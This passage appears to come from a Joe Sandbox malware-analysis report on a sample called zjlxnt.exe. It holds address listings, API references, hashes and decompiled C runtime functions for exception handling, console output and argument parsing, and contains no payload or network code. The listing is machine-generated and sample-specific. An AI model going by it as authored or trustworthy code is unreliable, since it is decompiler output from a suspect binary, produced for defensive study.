                                                          0x0040a304
                                                          0x00000000
                                                          0x0040a308
                                                          0x00000000
                                                          0x0040a137
                                                          0x0040a13c
                                                          0x0040a13f
                                                          0x0040a142
                                                          0x0040a148
                                                          0x0040a151
                                                          0x0040a15c
                                                          0x0040a161
                                                          0x0040a164
                                                          0x0040a167
                                                          0x0040a16d
                                                          0x00000000
                                                          0x0040a16d
                                                          0x0040a167
                                                          0x0040a07d
                                                          0x0040a08a
                                                          0x0040a08b
                                                          0x0040a08e
                                                          0x0040a090
                                                          0x0040a095
                                                          0x0040a2bc
                                                          0x0040a2be
                                                          0x0040a2c0
                                                          0x0040a2c3
                                                          0x0040a2c6
                                                          0x0040a2d3
                                                          0x0040a2d6
                                                          0x0040a2d8
                                                          0x0040a2d9
                                                          0x0040a2dd
                                                          0x0040a2dd
                                                          0x0040a2e1
                                                          0x0040a2e1
                                                          0x0040a2e1
                                                          0x0040a2e4
                                                          0x0040a2e4
                                                          0x0040a09b
                                                          0x0040a09b
                                                          0x0040a09d
                                                          0x0040a0a0
                                                          0x0040a0a2
                                                          0x0040a0a6
                                                          0x0040a0a7
                                                          0x0040a0a8
                                                          0x0040a0ac
                                                          0x0040a0af
                                                          0x0040a0b3
                                                          0x0040a0bd
                                                          0x0040a0c2
                                                          0x0040a0c5
                                                          0x0040a0c5
                                                          0x0040a0c8
                                                          0x0040a0cb
                                                          0x0040a0cd
                                                          0x0040a0d0
                                                          0x0040a0d9
                                                          0x0040a0dd
                                                          0x0040a0de
                                                          0x0040a0e5
                                                          0x0040a0eb
                                                          0x0040a0f3
                                                          0x0040a0fe
                                                          0x0040a103
                                                          0x0040a10e
                                                          0x0040a113
                                                          0x0040a119
                                                          0x0040a170
                                                          0x0040a176
                                                          0x0040a20b
                                                          0x0040a210
                                                          0x0040a222
                                                          0x0040a227
                                                          0x0040a22a
                                                          0x0040a22f
                                                          0x0040a24a
                                                          0x0040a32b
                                                          0x0040a331
                                                          0x0040a250
                                                          0x0040a256
                                                          0x0040a259
                                                          0x0040a25b
                                                          0x0040a25e
                                                          0x0040a267
                                                          0x0040a271
                                                          0x0040a2af
                                                          0x0040a2b2
                                                          0x0040a2b4
                                                          0x00000000
                                                          0x0040a2b4
                                                          0x0040a273
                                                          0x0040a275
                                                          0x0040a277
                                                          0x0040a290
                                                          0x00000000
                                                          0x0040a296
                                                          0x0040a29a
                                                          0x0040a2a0
                                                          0x0040a2a3
                                                          0x0040a2a9
                                                          0x0040a2ac
                                                          0x00000000
                                                          0x0040a2ac
                                                          0x0040a29a
                                                          0x0040a290
                                                          0x0040a271
                                                          0x0040a267
                                                          0x0040a24a
                                                          0x0040a22f
                                                          0x0040a119
                                                          0x0040a095
                                                          0x00000000
                                                          0x0040a17c
                                                          0x0040a17c
                                                          0x0040a183
                                                          0x0040a186
                                                          0x0040a18a
                                                          0x0040a18d
                                                          0x0040a1b0
                                                          0x0040a1b6
                                                          0x0040a1b8
                                                          0x0040a1bc
                                                          0x0040a1ed
                                                          0x0040a1f0
                                                          0x0040a1f2
                                                          0x00000000
                                                          0x0040a1be
                                                          0x0040a1be
                                                          0x0040a1c1
                                                          0x0040a1c4
                                                          0x0040a1c7
                                                          0x0040a30f
                                                          0x0040a31d
                                                          0x0040a326
                                                          0x0040a1cd
                                                          0x0040a1d7
                                                          0x0040a1dc
                                                          0x0040a1df
                                                          0x0040a1e2
                                                          0x0040a1e8
                                                          0x00000000
                                                          0x0040a1e8
                                                          0x0040a1e2
                                                          0x0040a1c7
                                                          0x0040a18f
                                                          0x0040a196
                                                          0x0040a199
                                                          0x0040a19c
                                                          0x0040a19e
                                                          0x0040a1a1
                                                          0x0040a1a8
                                                          0x0040a1aa
                                                          0x0040a1f3
                                                          0x0040a1f6
                                                          0x0040a1f7
                                                          0x0040a1fc
                                                          0x0040a1ff
                                                          0x0040a202
                                                          0x0040a208
                                                          0x00000000
                                                          0x0040a208
                                                          0x0040a202
                                                          0x00000000
                                                          0x0040a18d
                                                          0x0040a032
                                                          0x0040a333
                                                          0x0040a338
                                                          0x0040a340
                                                          0x0040a341
                                                          0x0040a342
                                                          0x0040a346
                                                          0x0040a34e
                                                          0x00000000

                                                          APIs
                                                          • GetConsoleOutputCP.KERNEL32(93C85C54,00000000,00000000,00000008), ref: 00409FF0
                                                            • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                                                          • GetLastError.KERNEL32 ref: 0040A32B
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                          • String ID:
                                                          • API String ID: 2112829910-0
                                                          • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                          • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                                                          • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                                                          • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                          				signed int* _t52;
                                                          				signed int _t53;
                                                          				intOrPtr _t54;
                                                          				signed int _t58;
                                                          				signed int _t61;
                                                          				intOrPtr _t71;
                                                          				signed int _t75;
                                                          				signed int _t79;
                                                          				signed int _t81;
                                                          				signed int _t84;
                                                          				signed int _t85;
                                                          				signed int _t97;
                                                          				signed int* _t98;
                                                          				signed char* _t101;
                                                          				signed int _t107;
                                                          				void* _t111;
                                                          
                                                          				_push(0x10);
                                                          				_push(0x413518);
                                                          				E00401EE0(__ebx, __edi, __esi);
                                                          				_t75 = 0;
                                                          				_t52 =  *(_t111 + 0x10);
                                                          				_t81 = _t52[1];
                                                          				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                                                          					L30:
                                                          					_t53 = 0;
                                                          					__eflags = 0;
                                                          					goto L31;
                                                          				} else {
                                                          					_t97 = _t52[2];
                                                          					if(_t97 != 0 ||  *_t52 < 0) {
                                                          						_t84 =  *_t52;
                                                          						_t107 =  *(_t111 + 0xc);
                                                          						if(_t84 >= 0) {
                                                          							_t107 = _t107 + 0xc + _t97;
                                                          						}
                                                          						 *(_t111 - 4) = _t75;
                                                          						_t101 =  *(_t111 + 0x14);
                                                          						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                                                          							L10:
                                                          							_t54 =  *((intOrPtr*)(_t111 + 8));
                                                          							__eflags = _t84 & 0x00000008;
                                                          							if((_t84 & 0x00000008) == 0) {
                                                          								__eflags =  *_t101 & 0x00000001;
                                                          								if(( *_t101 & 0x00000001) == 0) {
                                                          									_t84 =  *(_t54 + 0x18);
                                                          									__eflags = _t101[0x18] - _t75;
                                                          									if(_t101[0x18] != _t75) {
                                                          										__eflags = _t84;
                                                          										if(_t84 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											__eflags = _t107;
                                                          											if(_t107 == 0) {
                                                          												goto L32;
                                                          											} else {
                                                          												__eflags =  *_t101 & 0x00000004;
                                                          												_t79 = 0;
                                                          												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                                                          												__eflags = _t75;
                                                          												 *(_t111 - 0x20) = _t75;
                                                          												goto L29;
                                                          											}
                                                          										}
                                                          									} else {
                                                          										__eflags = _t84;
                                                          										if(_t84 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											__eflags = _t107;
                                                          											if(_t107 == 0) {
                                                          												goto L32;
                                                          											} else {
                                                          												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
                                                          												goto L29;
                                                          											}
                                                          										}
                                                          									}
                                                          								} else {
                                                          									__eflags =  *(_t54 + 0x18);
                                                          									if( *(_t54 + 0x18) == 0) {
                                                          										goto L32;
                                                          									} else {
                                                          										__eflags = _t107;
                                                          										if(_t107 == 0) {
                                                          											goto L32;
                                                          										} else {
                                                          											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
                                                          											__eflags = _t101[0x14] - 4;
                                                          											if(_t101[0x14] == 4) {
                                                          												__eflags =  *_t107;
                                                          												if( *_t107 != 0) {
                                                          													_push( &(_t101[8]));
                                                          													_push( *_t107);
                                                          													goto L21;
                                                          												}
                                                          											}
                                                          											goto L29;
                                                          										}
                                                          									}
                                                          								}
                                                          							} else {
                                                          								_t84 =  *(_t54 + 0x18);
                                                          								goto L12;
                                                          							}
                                                          						} else {
                                                          							_t71 =  *0x415c6c; // 0x0
                                                          							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                                                          							if(_t71 == 0) {
                                                          								goto L10;
                                                          							} else {
                                                          								 *0x40e160();
                                                          								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                                                          								L12:
                                                          								if(_t84 == 0 || _t107 == 0) {
                                                          									L32:
                                                          									E0040579A(_t75, _t84, _t97, _t107);
                                                          									asm("int3");
                                                          									_push(8);
                                                          									_push(0x413538);
                                                          									E00401EE0(_t75, _t101, _t107);
                                                          									_t98 =  *(_t111 + 0x10);
                                                          									_t85 =  *(_t111 + 0xc);
                                                          									__eflags =  *_t98;
                                                          									if(__eflags >= 0) {
                                                          										_t103 = _t85 + 0xc + _t98[2];
                                                          										__eflags = _t85 + 0xc + _t98[2];
                                                          									} else {
                                                          										_t103 = _t85;
                                                          									}
                                                          									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                                                          									_t108 =  *(_t111 + 0x14);
                                                          									_push( *(_t111 + 0x14));
                                                          									_push(_t98);
                                                          									_push(_t85);
                                                          									_t77 =  *((intOrPtr*)(_t111 + 8));
                                                          									_push( *((intOrPtr*)(_t111 + 8)));
                                                          									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
                                                          									__eflags = _t58;
                                                          									if(_t58 == 0) {
                                                          										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                                                          									} else {
                                                          										_t61 = _t58 - 1;
                                                          										__eflags = _t61;
                                                          										if(_t61 == 0) {
                                                          											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                                                          										}
                                                          									}
                                                          									 *(_t111 - 4) = 0xfffffffe;
                                                          									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                          									return _t61;
                                                          								} else {
                                                          									 *_t107 = _t84;
                                                          									_push( &(_t101[8]));
                                                          									_push(_t84);
                                                          									L21:
                                                          									 *_t107 = E00402768();
                                                          									L29:
                                                          									 *(_t111 - 4) = 0xfffffffe;
                                                          									_t53 = _t75;
                                                          									L31:
                                                          									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                                                          									return _t53;
                                                          								}
                                                          							}
                                                          						}
                                                          					} else {
                                                          						goto L30;
                                                          					}
                                                          				}
                                                          			}



















                                                          0x00403694
                                                          0x00403696
                                                          0x0040369b
                                                          0x004036a0
                                                          0x004036a2
                                                          0x004036a5
                                                          0x004036aa
                                                          0x004037ba
                                                          0x004037ba
                                                          0x004037ba
                                                          0x00000000
                                                          0x004036b9
                                                          0x004036b9
                                                          0x004036be
                                                          0x004036c8
                                                          0x004036ca
                                                          0x004036cf
                                                          0x004036d4
                                                          0x004036d4
                                                          0x004036d6
                                                          0x004036d9
                                                          0x004036de
                                                          0x00403700
                                                          0x00403700
                                                          0x00403703
                                                          0x00403706
                                                          0x00403724
                                                          0x00403727
                                                          0x00403766
                                                          0x00403769
                                                          0x0040376c
                                                          0x00403791
                                                          0x00403793
                                                          0x00000000
                                                          0x00403795
                                                          0x00403795
                                                          0x00403797
                                                          0x00000000
                                                          0x00403799
                                                          0x00403799
                                                          0x0040379e
                                                          0x004037a2
                                                          0x004037a2
                                                          0x004037a3
                                                          0x00000000
                                                          0x004037a3
                                                          0x00403797
                                                          0x0040376e
                                                          0x0040376e
                                                          0x00403770
                                                          0x00000000
                                                          0x00403772
                                                          0x00403772
                                                          0x00403774
                                                          0x00000000
                                                          0x00403776
                                                          0x00403787
                                                          0x00000000
                                                          0x0040378c
                                                          0x00403774
                                                          0x00403770
                                                          0x00403729
                                                          0x00403729
                                                          0x0040372d
                                                          0x00000000
                                                          0x00403733
                                                          0x00403733
                                                          0x00403735
                                                          0x00000000
                                                          0x0040373b
                                                          0x00403742
                                                          0x0040374a
                                                          0x0040374e
                                                          0x00403750
                                                          0x00403753
                                                          0x00403758
                                                          0x00403759
                                                          0x00000000
                                                          0x00403759
                                                          0x00403753
                                                          0x00000000
                                                          0x0040374e
                                                          0x00403735
                                                          0x0040372d
                                                          0x00403708
                                                          0x00403708
                                                          0x00000000
                                                          0x00403708
                                                          0x004036e5
                                                          0x004036e5
                                                          0x004036ea
                                                          0x004036ef
                                                          0x00000000
                                                          0x004036f1
                                                          0x004036f3
                                                          0x004036fc
                                                          0x0040370b
                                                          0x0040370d
                                                          0x004037cc
                                                          0x004037cc
                                                          0x004037d1
                                                          0x004037d2
                                                          0x004037d4
                                                          0x004037d9
                                                          0x004037de
                                                          0x004037e1
                                                          0x004037e4
                                                          0x004037e7
                                                          0x004037f0
                                                          0x004037f0
                                                          0x004037e9
                                                          0x004037e9
                                                          0x004037e9
                                                          0x004037f3
                                                          0x004037f7
                                                          0x004037fa
                                                          0x004037fb
                                                          0x004037fc
                                                          0x004037fd
                                                          0x00403800
                                                          0x00403809
                                                          0x00403809
                                                          0x0040380c
                                                          0x00403842
                                                          0x0040380e
                                                          0x0040380e
                                                          0x0040380e
                                                          0x00403811
                                                          0x00403828
                                                          0x00403828
                                                          0x00403811
                                                          0x00403847
                                                          0x00403851
                                                          0x0040385d
                                                          0x0040371b
                                                          0x0040371b
                                                          0x00403720
                                                          0x00403721
                                                          0x0040375b
                                                          0x00403762
                                                          0x004037a6
                                                          0x004037a6
                                                          0x004037ad
                                                          0x004037bc
                                                          0x004037bf
                                                          0x004037cb
                                                          0x004037cb
                                                          0x0040370d
                                                          0x004036ef
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004036be

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: AdjustPointer
                                                          • String ID:
                                                          • API String ID: 1740715915-0
                                                          • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                          • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                                                          • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                                                          • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040B766(void* _a4, long _a8, DWORD* _a12) {
                                                          				void* _t13;
                                                          
                                                          				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
                                                          				if(_t13 == 0 && GetLastError() == 6) {
                                                          					E0040B74F();
                                                          					E0040B711();
                                                          					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
                                                          				}
                                                          				return _t13;
                                                          			}




                                                          0x0040b783
                                                          0x0040b787
                                                          0x0040b794
                                                          0x0040b799
                                                          0x0040b7b4
                                                          0x0040b7b4
                                                          0x0040b7ba

                                                          APIs
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                                                          • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
                                                            • Part of subcall function 0040B74F: CloseHandle.KERNEL32(FFFFFFFE,0040B799,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008), ref: 0040B75F
                                                          • ___initconout.LIBCMT ref: 0040B799
                                                            • Part of subcall function 0040B711: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0040B740,0040AF0D,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B724
                                                          • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008), ref: 0040B7AE
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                          • String ID:
                                                          • API String ID: 2744216297-0
                                                          • Opcode ID: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                          • Instruction ID: 9be2d2e95ebdf4ca364c863a04f8f34c4778b8d92ece9612039581527531bafd
                                                          • Opcode Fuzzy Hash: 0cf35d0622a046613081d4d5705aad4e630b2f1f256b3374397953c6fad5f189
                                                          • Instruction Fuzzy Hash: 72F01236400124BBCF162F96DC049CA3F65EB883B1B008435FA18A6161C7318870DBD8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00404751(void* __edx, intOrPtr _a4) {
                                                          				signed int _v8;
                                                          				void* _v12;
                                                          				char _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				intOrPtr* _t33;
                                                          				intOrPtr _t36;
                                                          				intOrPtr* _t41;
                                                          				intOrPtr* _t42;
                                                          				WCHAR* _t47;
                                                          				intOrPtr _t52;
                                                          				void* _t55;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t57;
                                                          				intOrPtr _t58;
                                                          				intOrPtr _t61;
                                                          				intOrPtr _t64;
                                                          
                                                          				_t55 = __edx;
                                                          				_t57 = _a4;
                                                          				if(_t57 != 0) {
                                                          					if(_t57 == 2 || _t57 == 1) {
                                                          						GetModuleFileNameW(0, 0x415d20, 0x104);
                                                          						 *0x415f88 = 0x415d20;
                                                          						_t47 =  *0x415f9c; // 0x4f1c60
                                                          						if(_t47 == 0 ||  *_t47 == 0) {
                                                          							_t47 = 0x415d20;
                                                          						}
                                                          						_v8 = 0;
                                                          						_v16 = 0;
                                                          						_t61 = E00404A28(E00404887(_t47, 0, 0,  &_v8,  &_v16), _v8, _v16, 2);
                                                          						if(_t61 != 0) {
                                                          							E00404887(_t47, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
                                                          							if(_t57 != 1) {
                                                          								_push( &_v12);
                                                          								_v12 = 0;
                                                          								_t58 = E00406A91(0, _t55, _t57, _t61);
                                                          								if(_t58 == 0) {
                                                          									_t56 = _v12;
                                                          									_t52 = 0;
                                                          									_t33 = _t56;
                                                          									if( *_t56 == 0) {
                                                          										L17:
                                                          										 *0x415f8c = _t52;
                                                          										_v12 = 0;
                                                          										 *0x415f94 = _t56;
                                                          										E0040650B(0);
                                                          										_t58 = 0;
                                                          										L18:
                                                          										_v12 = 0;
                                                          										E0040650B(_t61);
                                                          										_t36 = _t58;
                                                          										goto L19;
                                                          									} else {
                                                          										goto L16;
                                                          									}
                                                          									do {
                                                          										L16:
                                                          										_t33 = _t33 + 4;
                                                          										_t52 = _t52 + 1;
                                                          									} while ( *_t33 != 0);
                                                          									goto L17;
                                                          								}
                                                          								E0040650B(_v12);
                                                          								goto L18;
                                                          							}
                                                          							 *0x415f94 = _t61;
                                                          							 *0x415f8c = _v8 - 1;
                                                          							goto L12;
                                                          						} else {
                                                          							_t41 = E0040649B();
                                                          							_push(0xc);
                                                          							_pop(0);
                                                          							 *_t41 = 0;
                                                          							L12:
                                                          							E0040650B(0);
                                                          							_t36 = 0;
                                                          							L19:
                                                          							goto L20;
                                                          						}
                                                          					} else {
                                                          						_t42 = E0040649B();
                                                          						_t64 = 0x16;
                                                          						 *_t42 = _t64;
                                                          						E004062A0();
                                                          						_t36 = _t64;
                                                          						L20:
                                                          						return _t36;
                                                          					}
                                                          				}
                                                          				return 0;
                                                          			}




















                                                          0x00404751
                                                          0x0040475a
                                                          0x0040475f
                                                          0x0040476c
                                                          0x00404798
                                                          0x0040479e
                                                          0x004047a4
                                                          0x004047ac
                                                          0x004047b3
                                                          0x004047b3
                                                          0x004047bb
                                                          0x004047c2
                                                          0x004047db
                                                          0x004047e2
                                                          0x00404801
                                                          0x0040480c
                                                          0x0040482f
                                                          0x00404831
                                                          0x00404839
                                                          0x0040483f
                                                          0x0040484b
                                                          0x0040484e
                                                          0x00404850
                                                          0x00404854
                                                          0x0040485e
                                                          0x0040485f
                                                          0x00404865
                                                          0x00404868
                                                          0x0040486e
                                                          0x00404873
                                                          0x00404875
                                                          0x00404877
                                                          0x0040487a
                                                          0x0040487f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00404856
                                                          0x00404856
                                                          0x00404856
                                                          0x00404859
                                                          0x0040485a
                                                          0x00000000
                                                          0x00404856
                                                          0x00404844
                                                          0x00000000
                                                          0x00404844
                                                          0x00404812
                                                          0x00404818
                                                          0x00000000
                                                          0x004047e4
                                                          0x004047e4
                                                          0x004047e9
                                                          0x004047eb
                                                          0x004047ec
                                                          0x0040481f
                                                          0x00404821
                                                          0x00404826
                                                          0x00404881
                                                          0x00000000
                                                          0x00404882
                                                          0x00404773
                                                          0x00404773
                                                          0x0040477a
                                                          0x0040477b
                                                          0x0040477d
                                                          0x00404782
                                                          0x00404883
                                                          0x00000000
                                                          0x00404883
                                                          0x0040476c
                                                          0x00000000

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.571904550.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_400000_zjlxnt.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: ]A$C:\Users\user\AppData\Local\Temp\zjlxnt.exe
                                                          • API String ID: 0-1155487506
                                                          • Opcode ID: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                          • Instruction ID: 516f48771e3ea8525e46061b4c90816104fcc3183a12e04dc85d04e75a492b31
                                                          • Opcode Fuzzy Hash: 4b1e80dd0c630a597ae57bd7ace0b530a474018883af56ddac1066d4e5a9de18
                                                          • Instruction Fuzzy Hash: 0731D6B6A00214BFD711EF95DC819DFBBACEB85354B11847FF605B7281D6388D018B98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 65%
                                                          			E00403C90(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				intOrPtr* _v16;
                                                          				signed int _v20;
                                                          				char _v24;
                                                          				intOrPtr _v28;
                                                          				signed int _v36;
                                                          				void* _v40;
                                                          				intOrPtr _v44;
                                                          				signed int _v48;
                                                          				intOrPtr _v56;
                                                          				void _v60;
                                                          				signed char* _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* _t74;
                                                          				void* _t75;
                                                          				char _t76;
                                                          				signed char _t78;
                                                          				signed int _t80;
                                                          				signed char* _t81;
                                                          				signed int _t82;
                                                          				signed int _t83;
                                                          				intOrPtr* _t87;
                                                          				void* _t90;
                                                          				signed char* _t93;
                                                          				intOrPtr* _t96;
                                                          				signed char _t97;
                                                          				intOrPtr _t98;
                                                          				intOrPtr _t99;
                                                          				intOrPtr* _t101;
                                                          				signed int _t102;
                                                          				signed int _t103;
                                                          				signed char _t108;
                                                          				signed char* _t111;
                                                          				signed int _t112;
                                                          				signed char* _t116;
                                                          				void* _t121;
                                                          				signed int _t123;
                                                          				void* _t130;
                                                          				void* _t131;
                                                          
                                                          				_t110 = __edx;
                                                          				_t100 = __ecx;
                                                          				_t96 = _a4;
                                                          				if( *_t96 == 0x80000003) {
                                                          					return _t74;
                                                          				} else {
                                                          					_push(_t121);
                                                          					_t75 = E004029B3(_t96, __ecx, __edx, _t121);
                                                          					if( *((intOrPtr*)(_t75 + 8)) != 0) {
                                                          						__imp__EncodePointer(0);
                                                          						_t121 = _t75;
                                                          						if( *((intOrPtr*)(E004029B3(_t96, __ecx, __edx, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
                                                          							_t87 = E00402E31(__edx, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
                                                          							_t130 = _t130 + 0x1c;
                                                          							if(_t87 != 0) {
                                                          								L16:
                                                          								return _t87;
                                                          							}
                                                          						}
                                                          					}
                                                          					_t76 = _a20;
                                                          					_v24 = _t76;
                                                          					_v20 = 0;
                                                          					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
                                                          						_push(_a28);
                                                          						E00402D64(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
                                                          						_t112 = _v36;
                                                          						_t131 = _t130 + 0x18;
                                                          						_t87 = _v40;
                                                          						_v16 = _t87;
                                                          						_v8 = _t112;
                                                          						if(_t112 < _v28) {
                                                          							_t102 = _t112 * 0x14;
                                                          							_v12 = _t102;
                                                          							do {
                                                          								_t103 = 5;
                                                          								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
                                                          								_t131 = _t131 + 0xc;
                                                          								if(_v60 <= _t90 && _t90 <= _v56) {
                                                          									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
                                                          									_t108 = _t93[4];
                                                          									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
                                                          										if(( *_t93 & 0x00000040) == 0) {
                                                          											_push(0);
                                                          											_push(1);
                                                          											E0040386B(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
                                                          											_t112 = _v8;
                                                          											_t131 = _t131 + 0x30;
                                                          										}
                                                          									}
                                                          								}
                                                          								_t112 = _t112 + 1;
                                                          								_t87 = _v16;
                                                          								_t102 = _v12 + 0x14;
                                                          								_v8 = _t112;
                                                          								_v12 = _t102;
                                                          							} while (_t112 < _v28);
                                                          						}
                                                          						goto L16;
                                                          					}
                                                          					E0040579A(_t96, _t100, _t110, _t121);
                                                          					asm("int3");
                                                          					_t111 = _v68;
                                                          					_push(_t96);
                                                          					_push(_t121);
                                                          					_push(0);
                                                          					_t78 = _t111[4];
                                                          					if(_t78 == 0) {
                                                          						L41:
                                                          						_t80 = 1;
                                                          					} else {
                                                          						_t101 = _t78 + 8;
                                                          						if( *_t101 == 0) {
                                                          							goto L41;
                                                          						} else {
                                                          							_t116 = _a4;
                                                          							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
                                                          								_t97 = _t116[4];
                                                          								_t123 = 0;
                                                          								if(_t78 == _t97) {
                                                          									L33:
                                                          									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
                                                          										_t81 = _a8;
                                                          										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
                                                          											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
                                                          												_t123 = 1;
                                                          											}
                                                          										}
                                                          									}
                                                          									_t80 = _t123;
                                                          								} else {
                                                          									_t59 = _t97 + 8; // 0x6e
                                                          									_t82 = _t59;
                                                          									while(1) {
                                                          										_t98 =  *_t101;
                                                          										if(_t98 !=  *_t82) {
                                                          											break;
                                                          										}
                                                          										if(_t98 == 0) {
                                                          											L29:
                                                          											_t83 = _t123;
                                                          										} else {
                                                          											_t99 =  *((intOrPtr*)(_t101 + 1));
                                                          											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
                                                          												break;
                                                          											} else {
                                                          												_t101 = _t101 + 2;
                                                          												_t82 = _t82 + 2;
                                                          												if(_t99 != 0) {
                                                          													continue;
                                                          												} else {
                                                          													goto L29;
                                                          												}
                                                          											}
                                                          										}
                                                          										L31:
                                                          										if(_t83 == 0) {
                                                          											goto L33;
                                                          										} else {
                                                          											_t80 = 0;
                                                          										}
                                                          										goto L42;
                                                          									}
                                                          									asm("sbb eax, eax");
                                                          									_t83 = _t82 | 0x00000001;
                                                          									goto L31;
                                                          								}
                                                          							} else {
                                                          								goto L41;
                                                          							}
                                                          						}
                                                          					}
                                                          					L42:
                                                          					return _t80;
                                                          				}
                                                          			}













































                                                          0x00403c90
                                                          0x00403c90
                                                          0x00403c97
                                                          0x00403ca0
                                                          0x00403dbf
